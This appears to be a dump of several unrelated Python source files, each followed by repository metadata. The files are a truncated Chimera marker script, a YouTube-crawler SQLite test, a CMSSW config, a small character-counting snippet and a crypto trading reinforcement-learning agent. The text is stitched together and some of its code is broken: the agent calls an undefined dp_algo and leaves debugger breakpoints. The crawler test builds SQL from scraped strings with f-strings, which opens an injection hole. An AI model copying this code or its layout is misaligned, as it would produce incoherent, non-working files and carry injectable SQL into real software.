marker_sets["Cog4_1"]=s
s= marker_sets["Cog4_1"]
mark=s.place_marker((418.803, 631.628, 390.651), (0, 0, 0.8), 17.1475)
if "Cog4_2" not in marker_sets:
s=new_marker_set('Cog4_2')
marker_sets["Cog4_2"]=s
s= marker_sets["Cog4_2"]
mark=s.place_marker((430.659, 619.791, 414.057), (0, 0, 0.8), 17.1475)
if "Cog4_3" not in marker_sets:
s=new_marker_set('Cog4_3')
marker_sets["Cog4_3"]=s
s= marker_sets["Cog4_3"]
mark=s.place_marker((441.889, 604.958, 436.027), (0, 0, 0.8), 17.1475)
if "Cog4_4" not in marker_sets:
s=new_marker_set('Cog4_4')
marker_sets["Cog4_4"]=s
s= marker_sets["Cog4_4"]
mark=s.place_marker((450.621, 588.404, 457.689), (0, 0, 0.8), 17.1475)
if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((452.564, 570.965, 480.262), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((448.285, 552.608, 502.006), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((503.896, 596.613, 254.276), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((389.623, 500.887, 750.203), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((406.11, 566.292, 511.876), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((406.11, 566.292, 511.876), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((401.349, 550.249, 488.024), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((394.94, 525.327, 473.63), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((383.151, 500.87, 485.36), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((469.104, 432.083, 545.69), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((288.584, 560.938, 430.957), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((446.828, 478.588, 531.305), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((446.806, 478.412, 531.239), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((450.168, 479.07, 559.487), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((478.828, 480.026, 559.693), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((501.073, 495.177, 549.243), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((519.89, 509.002, 532.431), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((532.184, 527.196, 514.089), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((533.233, 545.422, 492.177), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((476.078, 573.433, 549.187), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((588.446, 515.949, 430.702), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((436.493, 558.369, 567.586), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((427.304, 539.16, 552.213), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((405.938, 497.581, 518.287), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((384.965, 456.044, 484.45), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((409.45, 408.08, 544.619), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((337.482, 436.849, 393.392), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((445.821, 506.296, 618.963), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((431.934, 504.532, 594.169), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((420.549, 498.013, 568.796), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((397.345, 507.847, 554.421), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((372.335, 517.103, 542.227), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((346.232, 526.092, 531.601), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((422.678, 513.57, 549.038), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((266.561, 540.501, 512.139), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"[email protected]"
] | |
7cc18262aae9e23485ef02cce277089efcc19d95 | 72196ee3747efd8c3b82e4f32987b6e49f7b7deb | /test.py | 0db252b10609d302180d56b165870e79726b10c9 | [
"MIT"
] | permissive | easthobb/Youtube-Crawler | 2a76e0955faa3f070a134e415c156fc27bca8d65 | e85b96110a5f1196dacf71ed11c15f65c757cf05 | refs/heads/main | 2023-02-28T02:27:20.239110 | 2021-01-31T06:00:54 | 2021-01-31T06:00:54 | 330,909,307 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,478 | py | import sqlite3
import time
def db_manage_channel_info(c_list):
channel_id = c_list[0]
channel_name = c_list[1]
subscribe_count = int(c_list[2])
channel_description = c_list[3]
try:
# DB connect
conn = sqlite3.connect('crawler.db')
cur = conn.cursor()
print("connect")
# DB 조회
cur.execute(f"SELECT channel_id from channel_info;")
db_list = cur.fetchall()
db_channel_id_list = []
for element in list(map(list, db_list)):
db_channel_id_list.append(element[0])
print("show")
# DB 기등록된 채널
if channel_id in db_channel_id_list:
# update channel_info set channel_name = "LAS", subscribe_count=1500, channel_description="TEST" where channel_id = "UCsU-I-vHLiaMfV_ceaYz5rQ";
cur.execute(
f"update channel_info set channel_name = \"{channel_name}\", subscribe_count={subscribe_count}, channel_description=\"{channel_description}\" where channel_id = \"{channel_id}\";")
else:
cur.execute("INSERT INTO channel_info VALUES(?,?,?,?)", c_list)
conn.commit()
conn.close()
print("done")
except:
conn.commit()
conn.close()
print("error")
print(db_channel_id_list)
def db_manage_channel_upload(video_info_list):
try:
# DB connect
conn = sqlite3.connect('crawler.db')
cur = conn.cursor()
print("DB connect...")
# 테이블에 존재하는 video_id 한번에 받아옴
cur.execute("SELECT video_id from channel_upload;")
db_list = cur.fetchall()
db_video_id_list = []
for element in list(map(list, db_list)): # 튜플의 리스트 -> 리스트로
db_video_id_list.append(element[0])
print("GET channel_upload ...")
# 개별 video에 대해 반복 조회 -> 삽입 업데이트 분기
for video_info in video_info_list:
# 개별 video의 영상 정보 매핑
video_id = video_info[0] # 조회를 위한 video_id : KEY
channel_id = video_info[2] # 채널아이디
pub_time = video_info[3] # 영상업로드시간
description = video_info[4] # 영상설명
thumbnail_URL = video_info[8] # 영상 썸네일 url
video_URL = video_info[9] # 영상 시청 url
if video_id in db_video_id_list:
# update - 채널 id & 영상 id 안바꿈
cur.execute(f'''
update channel_upload set
pub_time = "{pub_time}",
description = "{description}",
thumbnail_URL = "{thumbnail_URL}",
video_URL = "{video_URL}"
where video_id = "{video_id}";
''')
print(video_id, "is updated")
else:
print("pass")
# insert - 모두 새로 삽입
cur.execute(f'''
insert into channel_upload values("{video_id}","{channel_id}","{pub_time}","{description}","{thumbnail_URL}","{video_URL}");''')
print("pass")
print(video_id, "is inserted")
conn.commit()
conn.close()
print("done")
except:
conn.commit()
conn.close()
print("error")
def db_manage_channel_monthly_update_videos(video_info_list):
#월간 테이블 존재 여부 확인 - 원래 계획은 달 단위로 일단은 한 테이블에 적재하는 것으로....
try:
# DB connect
conn = sqlite3.connect('crawler.db')
cur = conn.cursor()
print("DB connect...")
# 테이블에 존재하는 video_id 한번에 받아옴
cur.execute("SELECT video_id from monthly_update_videos;")
db_list = cur.fetchall()
db_video_id_list = []
for element in list(map(list, db_list)): # 튜플의 리스트 -> 리스트로
db_video_id_list.append(element[0])
print("GET monthly_upload_video ...")
print(db_video_id_list)
# 개별 video에 대해 반복 조회 -> 삽입 업데이트 분기
for video_info in video_info_list:
# 개별 video의 영상 정보 매핑
video_id = video_info[0] # 조회를 위한 video_id : KEY
views = int(video_info[5]) # 조회수
likes = int(video_info[6]) # 영상 좋아요 수
comments = int(video_info[7]) # 영상 댓글 수
upload = video_info[3].split("T")[0] # 영상 업로드 시간
print(video_id,views,likes,comments,upload)
if video_id in db_video_id_list:
# update - 채널 id 불변
cur.execute(f'''
update monthly_update_videos set
views = "{views}",
likes = "{likes}",
comments = "{comments}",
upload = "{upload}"
where video_id = "{video_id}";
''')
print(video_id, "is updated")
else:
print("pass")
# insert - 모두 새로 삽입
cur.execute(f'''
insert into monthly_update_videos values("{video_id}","{views}","{likes}","{comments}","{upload}");
''')
print(video_id, "is inserted")
conn.commit()
conn.close()
print("done")
except:
conn.commit()
conn.close()
print("error")
if __name__ == "__main__":
# [video_id0,title,channel_id,pub_time,description,views,likes,comments,thumbnail_URL,video_URL]
channel_info_list = ['UCsU-I-vHLiaMfV_ceaYz5rQ', 'JTBC News', '1500000','관점과 분석이 있는 뉴스, JTBC 뉴스 공식 유튜브 채널입니다. \n\nWelcome to the official JTBC News Channel.\n\nEasy and Fun news channel 15! You will find the faster and more accurate news on JTBC.']
video_info_list = [['zPFTNSH1Gns', "갸갸갸?", 'UCsU-I-vHLiaMfV_ceaYz5rQ', '2021-01-23T03:00:27Z', 'rirriririririri', '710393', '6424', '4628', 'https://i.ytimg.com/vi/zPFTNSH1Gns/default.jpg', 'https://www.youtube.com/watch?v=zPFTNSH1Gns']]
db_manage_channel_info(channel_info_list)
time.sleep(1)
db_manage_channel_upload(video_info_list)
time.sleep(2)
db_manage_channel_monthly_update_videos(video_info_list)
| [
"[email protected]"
] | |
4349b5d95998621201cd804c6a641f363832b3e0 | 949633cd7f09a68b19304af14562b29514261ecc | /Geometry/TrackerGeometryBuilder/test/trackerParameters_cfg.py | 1263a0ad400017383ae646c097899c7b6f6945f5 | [] | permissive | gsfs/cmssw | eabfe97b0594287ce25556e6b091956b72baad72 | fdbcb59c16cafd2a9b56177064bc0b6b93cc51dc | refs/heads/CMSSW_8_0_X | 2021-01-21T23:41:29.108786 | 2019-04-11T16:11:14 | 2019-04-11T16:11:14 | 226,406,411 | 0 | 0 | Apache-2.0 | 2019-12-06T20:39:25 | 2019-12-06T20:39:24 | null | UTF-8 | Python | false | false | 921 | py | import FWCore.ParameterSet.Config as cms
from Configuration.AlCa.autoCond import autoCond
process = cms.Process("TrackerParametersTest")
process.load('Configuration.StandardSequences.GeometryDB_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.GlobalTag.globaltag = autoCond['run1_mc']
process.GlobalTag.toGet = cms.VPSet(cms.PSet(record = cms.string('PTrackerParametersRcd'),
tag = cms.string('TK_Parameters_Test02'),
connect = cms.untracked.string("sqlite_file:./myfile.db")
)
)
process.source = cms.Source("EmptySource")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.test = cms.EDAnalyzer("TrackerParametersAnalyzer")
process.p1 = cms.Path(process.test)
| [
"[email protected]"
] | |
4b66cab70207121bd13efa0b75a852e3c4c178fe | 597c4f48332251552a602122bb3d325bc43a9d7f | /chapter02_hard_to_think/06_how_many_alphabets/12_how_many_alphabet_list.py | f4cc76277009cab92c5cd3074adf8c9f701d3715 | [] | no_license | Kyeongrok/python_algorithm | 46de1909befc7b17766a57090a7036886361fd06 | f0cdc221d7908f26572ae67b5c95b12ade007ccd | refs/heads/master | 2023-07-11T03:23:05.782478 | 2023-06-22T06:32:31 | 2023-06-22T06:32:31 | 147,303,654 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | string = 'out of sight, out of mind'
count_each = [0] * 26
for char in string:
if char.isalpha() == True:
print(ord(char) - 97) | [
"[email protected]"
] | |
09da4ffd3e4afccd056d4ef08fddfe12dfa6ea68 | 678c928458276bb07d2af4e61056a5eb8ea2a624 | /agent.py | 229d700249a46d0b905c3cb3b3706d2008f1bd31 | [] | no_license | amitvpatel06/Crypto-RL-Kraken | cb68a9fb67cc97136618dc675a91f495e99b6021 | f4865ece93e51320e4b9eab8e050ec3498cd78bb | refs/heads/master | 2021-07-09T15:56:54.798756 | 2017-10-10T16:16:24 | 2017-10-10T16:16:24 | 96,155,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,836 | py | from environment import *
from collections import defaultdict
from Q import *
from Qfunction_approx import *
import csv # for reading
import sys
import numpy as np
import math
import multiprocess # for multithreading
class Buffer:
def __init__(self, look_back, rolling_window=150):
self.history = []
self.rolling_window = rolling_window
self.summands = []
self.max = -999999999999
self.min = 999999999999
self.sum = 0
self.look_back = look_back
def update_rolling_sum(self, next_value):
self.summands.append(next_value)
self.sum += next_value
if len(self.summands) > self.rolling_window :
self.sum -= self.summands[0]
self.summands.pop(0)
def buffer_add(self, addition):
self.curr = addition
self.history.append(addition)
if len(self.history) > self.look_back:
self.history.pop(0)
self.max = addition if max(self.history) < addition else max(self.history)
self.min = addition if min(self.history) > addition else min(self.history)
def get_zone(self, target, divs):
if target < self.min:
return 0
elif target > self.max:
return divs
else:
return ((target - self.min) // ((self.max - self.min)/(divs - 1)) + 1)
def generate_state(market, divs):
state = {}
state['T'] = market['T']
state['I'] = market['I']
state['Spread'] = market['Spreads'].get_zone(market['Spreads'].curr, divs)
state['Misbalance'] = market['Misbalances'].get_zone(market['Misbalances'].curr, divs)
state['RollingVol'] = market['RollingVol'].get_zone(market['RollingVol'].curr, divs)
state['RollingSignedVol'] = market['RollingSignedVol'].get_zone(market['RollingSignedVol'].curr, divs)
return state
def update_market(market):
diff, net_vol, total_vol = market['book'].ob_diff(market['nextbook'])
market['currstate'].apply_diff(diff)
market['Spreads'].buffer_add(market['currstate'].get_spread())
market['Misbalances'].buffer_add(market['currstate'].get_misbalance())
market['RollingSignedVol'].update_rolling_sum(net_vol)
market['RollingSignedVol'].buffer_add(market['RollingSignedVol'].sum)
market['RollingVol'].update_rolling_sum(total_vol)
market['RollingVol'].buffer_add(market['RollingVol'].sum)
market['book'] = market['nextbook']
def generate_data(env, market, start, end):
market['currstate'] = env.get_book(start)
market['book'] = env.get_book(start)
for idx in range(start + 1, end + 1):
market['nextbook'] = env.get_book(idx)
update_market(market)
def reset_market(look_back, rolling_window):
market = {
'I': 0,
'Spreads': Buffer(look_back),
'Misbalances': Buffer(look_back),
'RollingVol': Buffer(look_back),
'RollingSignedVol': Buffer(look_back)
}
return market
def measure_profitability_path(env, times, backup, units, look_back, rolling_window, divs):
table = Q(1, backup)
percent_table = Q(1, backup)
# state variables
time = {}
profits = {}
T = times[0]
market = reset_market(look_back, rolling_window)
market['currstate'] = env.get_book(0)
market['book'] = env.get_book(0)
S = 1000
# train algorithm to buy
for T in times:
print (T)
time['T'] = T
for ts in range(look_back, look_back + S):
if ts > look_back:
market = reset_market(look_back, rolling_window)
market['T'] = T
generate_data(env, market, ts - look_back, ts)
cost = env.vol_order(market['currstate'], 0, units)
s = generate_state(market, divs)
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
exit = market['currstate'].immediate_cost_sell(units)
neg_percent_profit = -1 * (exit - cost)/cost * 100
table.update_table(s, 1, neg_percent_profit)
if neg_percent_profit < -0.5:
percent_table.update_table(s, 1, 0)
else:
percent_table.update_table(s, 1, 1)
# train algorithm to sell
for T in times:
print (T)
time['T'] = T
for ts in range(look_back, look_back + S):
if ts > look_back:
market = reset_market(look_back, rolling_window)
market['T'] = T
generate_data(env, market, ts - look_back, ts)
short = env.vol_order(market['currstate'], 1, units)
s = generate_state(market, divs)
exited = False
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
close = market['currstate'].immediate_cost_buy(units)
neg_percent_profit = -1 * (short - close)/short * 100
table.update_table(s, -1, neg_percent_profit)
if neg_percent_profit < -0.5:
percent_table.update_table(s, -1, 0)
else:
percent_table.update_table(s, -1, 1)
current_time = {}
profit_table = Q(1, backup)
for T in times:
market['T'] = T
current_time['T'] = T
for ts in range(look_back + S, look_back + S + 5000):
if ts % 100 == 0:
print(ts)
if ts > look_back:
market = reset_market(look_back, rolling_window)
market['T'] = T
generate_data(env, market, ts - look_back, ts)
s = generate_state(market, divs)
action, value = table.arg_min(s)
if value < 0.2:
# choose position to take based on the action suggested by table
exited = False
side = 0 if action == 1 else 1
enter = env.vol_order(market['currstate'], side, units)
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
# determine profitability based on side
if side == 0:
# long position exit
exit = market['currstate'].immediate_cost_sell(units)
percent = (exit - enter)/enter * 100
else:
# short position exit
exit = market['currstate'].immediate_cost_buy(units)
percent = (enter - exit)/enter * 100
if percent > 0.52:
profit_table.update_table(current_time, 1, percent)
exited = True
break
if not exited:
profit_table.update_table(current_time, 1, percent)
import pdb
pdb.set_trace()
def rl_agent(env, times, backup, units, look_back, rolling_window, divs):
table = Q(1, backup)
percent_table = Q(1, backup)
# state variables
time = {}
profits = {}
T = max(times)
market = reset_market(look_back, rolling_window)
market['currstate'] = env.get_book(0)
market['book'] = env.get_book(0)
S = 1000
print (list(times))
backup_transitions = []
order_books = len(env.books)
random.seed(1)
for side in range(2):
opposite_side = (side + 1) % 2
action = pow(-1, side)
for ex in range(look_back, look_back + S):
ts = random.randint(look_back + 2, order_books - (T + 10))
if ex % 100 == 0:
backup_trs(table, backup_transitions)
backup_transitions = []
print(ts)
# set up the simulation and collect the lookback data
market = reset_market(look_back, rolling_window)
generate_data(env, market, ts - look_back, ts)
# calculate initial position cost and value
initial_p = env.vol_order(market['currstate'], side, units)
market['T'] = 0
s_0 = generate_state(market, divs)
market['I'] = pow(-1, side)
state_number = 0
for t in range(T + 1):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
if t in times:
market['T'] = t
state_number += 1
s_curr = generate_state(market, divs)
if state_number == 1:
curr_pos_v = market['currstate'].immediate_value(opposite_side, units)
neg_percent_profit = pow(-1, side + 1) * (curr_pos_v - initial_p)/initial_p * 100
backup_transitions.append([s_0, action, neg_percent_profit, curr_pos_v, initial_p])
else:
next_pos_v = market['currstate'].immediate_value(opposite_side, units)
neg_percent_change = pow(-1, side + 1) * (next_pos_v - curr_pos_v)/curr_pos_v * 100
backup_transitions.append([s_prev, 1, neg_percent_change, next_pos_v, curr_pos_v])
curr_pos_v = next_pos_v
s_prev = s_curr
backup_trs(table, backup_transitions)
current_time = {}
profit_table = Q(1, backup)
pred = []
act = []
for ex in range(0, 2000):
ts = random.randint(look_back, order_books - (T + 10))
if ex % 100 == 0:
print(ts)
if ts >= look_back:
market = reset_market(look_back, rolling_window)
market['T'] = 0
generate_data(env, market, ts - look_back, ts)
s_0 = generate_state(market, divs)
action, value = table.arg_min(s_0)
if value < -1:
pred.append(value)
# choose position to take based on the action suggested by table
side = 0 if action == 1 else 1
opposite_side = (side + 1) % 2
market['I'] = pow(-1, side)
enter_v = env.vol_order(market['currstate'], side, units)
exited = False
for t in range(T):
market['nextbook'] = env.get_book(ts + t + 1)
update_market(market)
if t in times:
market['T'] = t
curr_s = generate_state(market, divs)
a, v = table.arg_min(curr_s)
if v >= 0:
print ([a, v, t])
current_time['T'] = T
exit_v = market['currstate'].immediate_value(opposite_side, units)
percent = pow(-1, side) * (exit_v - enter_v )/enter_v * 100
act.append(percent)
profit_table.update_table(current_time, action, percent)
exited = True
break
if not exited:
current_time['T'] = T
exit_v = market['currstate'].immediate_value(opposite_side, units)
percent = pow(-1, side) * (exit_v - enter_v)/enter_v * 100
act.append(percent)
profit_table.update_table(current_time, action, percent)
import pdb
pdb.set_trace()
def backup_trs(table, backup_transitions):
states_done = 0
for transition in backup_transitions[::-1]:
state, action, reward, _, _ = transition
table.update_table(state, 0, 0)
if states_done == 0:
#print([state, action, reward, reward])
table.update_table(state, action, reward)
next_state_reward = reward
else:
backup = reward + min(next_state_reward, 0)
#print([state, action, reward, backup])
table.update_table(state, action, backup)
_, next_state_reward = table.arg_min(state)
states_done += 1
def process_output(table, func, executions, T, L):
"""
Process output for each run and write to file
"""
if table.backup['name'] == 'sampling' or table.backup['name'] == 'replay buffer':
table_to_write = table.Q
elif table.backup['name'] == 'doubleQ':
if func is None:
table_to_write = table.curr_Q
else:
table_to_write = []
table_to_write.append(table.Q_1)
table_to_write.append(table.Q_2)
else:
print ('agent.dp_algo - invalid backup method')
tradesOutputFilename = ''
if not func is None:
# linear approx model
tradesOutputFilename += 'linear-'
tradesOutputFilename += table.backup['name']
write_trades(executions, tradesOutputFilename=tradesOutputFilename)
if func is None:
write_table_files(table_to_write, T, L, tableOutputFilename=table.backup['name'])
else:
write_function(table_to_write, T, L, 'linear model',functionFilename=table.backup['name'])
def create_variable_divs(divs, env):
spreads = []
misbalances = []
imm_costs = []
signed_vols = []
if divs > 1:
spread_diff = (env.max_spread - env.min_spread) * 1.0 / (divs)
misbalance_diff = (env.max_misbalance - env.min_misbalance) * 1.0 / (divs)
imm_cost_diff = (env.max_imm_cost - env.min_imm_cost) * 1.0 / (divs)
signed_vols_diff = (env.max_signed_vol - env.min_signed_vol) * 1.0 / (divs)
for i in range(1, divs):
spreads.append(env.min_spread + i * spread_diff)
misbalances.append(env.min_misbalance + i * misbalance_diff)
imm_costs.append(env.min_imm_cost + i * imm_cost_diff)
signed_vols.append(env.min_signed_vol + i * signed_vols_diff)
spreads.sort()
misbalances.sort()
imm_costs.sort()
signed_vols.sort()
return spreads, misbalances, imm_costs, signed_vols
def compute_signed_vol(vol, signed_vols):
if len(signed_vols) == 0 or vol < signed_vols[0]:
return 0
for i in range(len(signed_vols) - 1):
if vol >= signed_vols[i] and vol < signed_vols[i+1]:
return (i + 1)
return len(signed_vols)
def compute_imm_cost(curr_book, inv, im_costs):
if inv == 0:
return 0
im_cost = curr_book.immediate_cost_buy(inv)
if len(im_costs) == 0 or im_cost < im_costs[0]:
return 0
for i in range(len(im_costs) - 1):
if im_cost >= im_costs[i] and im_cost < im_costs[i+1]:
return (i + 1)
return len(im_costs)
def compute_bid_ask_spread(curr_book, spreads):
spread = min(curr_book.a.keys()) - max(curr_book.b.keys())
if len(spreads) == 0 or spread < spreads[0]:
return 0
for i in range(len(spreads) - 1):
if spread >= spreads[i] and spread < spreads[i+1]:
return (i + 1)
return len(spreads)
def compute_volume_misbalance(curr_book, misbalances, env):
m = env.misbalance(curr_book)
if len(misbalances) == 0 or m < misbalances[0]:
return 0
for i in range(len(misbalances) - 1):
if m >= misbalances[i] and m < misbalances[i+1]:
return (i + 1)
return len(misbalances)
def write_trades(executions, tradesOutputFilename="run"):
trade_file = open(tradesOutputFilename + '-trades.csv', 'w')
# write trades executed
w = csv.writer(trade_file)
executions.insert(0, ['Time Left', 'Rounded Units Left', 'Bid Ask Spread', 'Volume Misbalance', 'Immediate Cost', 'Signed Transcation Volume' ,'Action', 'Reward', 'Volume'])
w.writerows(executions)
def write_function(function, T, L, model, functionFilename='run'):
table_file = open(functionFilename + '-' + model + '.csv', 'w')
tw = csv.writer(table_file)
table_rows = []
table_rows.append(['Time Left', 'Rounded Units Left', 'Bid Ask Spread', 'Volume Misbalance', 'Immediate Cost', 'Signed Transcation Volume','Action'])
if type(function) is list:
table_rows.append(function[0].coef_)
table_rows.append(function[1].coef_)
table_rows.append(function[0].intercept_)
table_rows.append(function[1].intercept_)
else:
table_rows.append(function.coef_)
table_rows.append(function.intercept_)
tw.writerows(table_rows)
def write_table_files(table, T, L, tableOutputFilename="run"):
table_file = open(tableOutputFilename + '-tables.csv', 'w')
# write table
tw = csv.writer(table_file)
table_rows = []
table_rows.append(['Time Left', 'Rounded Units Left', 'Bid Ask Spread', 'Volume Misbalance', 'Immediate Cost', 'Signed Transcation Volume', 'Action', 'Expected Payout'])
for key in table:
for action, payoff in table[key].items():
if type(action) != str:
t_left, rounded_unit, spread, volume_misbalance, im_cost, signed_vol = key.split(",")
table_rows.append([t_left, rounded_unit, spread, volume_misbalance, im_cost, signed_vol, action, payoff])
tw.writerows(table_rows)
"""
We here run three backup methods based on how dp tables are updated:
- sampling (simple update)
- double q learning
- replay buffer
"""
if __name__ == "__main__":
# define method params
doubleQbackup = {
'name': 'doubleQ'
}
samplingBackup = {
'name': 'sampling'
}
replayBufferBackup = { 'name': 'replay buffer',
'buff_size': 50,
'replays': 5
}
# tables
doubleQProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, doubleQbackup, 100000))
samplingProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, samplingBackup, 100000))
replayBufferProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, replayBufferBackup, 100000))
# start
#doubleQProcess.start()
samplingProcess.start()
#replayBufferProcess.start()
# function approx
#func_doubleQProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, doubleQbackup, "linear", 100000))
#func_samplingProcess = multiprocess.Process(target=dp_algo, args=("../data/10_GOOG.csv", 1000, 1000, 10, 10, 10, samplingBackup, "linear", 100000))
